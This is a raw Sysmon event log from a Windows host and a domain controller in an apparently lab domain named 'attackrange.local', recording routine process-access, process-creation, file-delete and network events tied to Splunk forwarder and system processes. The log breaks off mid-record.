08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810167Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810166Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810165Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810164Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810163Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810162Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:27.610{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F803-60EB-DA79-00000000D001}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810161Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.610{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F803-60EB-DA79-00000000D001}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810160Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.595{0C1E0330-F803-60EB-DA79-00000000D001}3068C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810159Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.235{0C1E0330-F802-60EB-D979-00000000D001}28963404C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810158Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:27.204{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BF12B95FE12F3BF738F1D660B9B6C9C,SHA256=8FDE86DA4EE7DA01835263E4E35613905945EC97F2C2EB3C4AE3F5862AD92142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:28.686{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9130CA773DCF0950780DB4B9EE1DDF5,SHA256=123B825B05C3E5F3DBAB5E2C78B156AEDC3A689215E6E8078B0C51B35233C9D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810189Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.454{0C1E0330-F804-60EB-DB79-00000000D001}39522948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810188Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F804-60EB-DB79-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810187Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F804-60EB-DB79-00000000D001}3952C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810186Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810185Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810184Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810183Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810182Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810181Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810180Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810179Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810178Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810177Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.313{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F804-60EB-DB79-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810176Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:28.283{0C1E0330-F804-60EB-DB79-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810175Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:06:28.204{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=151CC76167CE8F7F6212DF06AA032E81,SHA256=B524892FEFA7A72FE28B49684D0D3414830B034B6A6C0B2265A3503B8D63D0D0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:20.615{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61948-false10.0.1.12-8000- 23542300x80000000000000001054250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:29.701{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5486AB91444C0E58451559EB77E88F39,SHA256=8DA02896440FA84DBDBE1D3E1399EC917D5ACABF2992255B99F77CB572F9C46E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810192Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:29.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 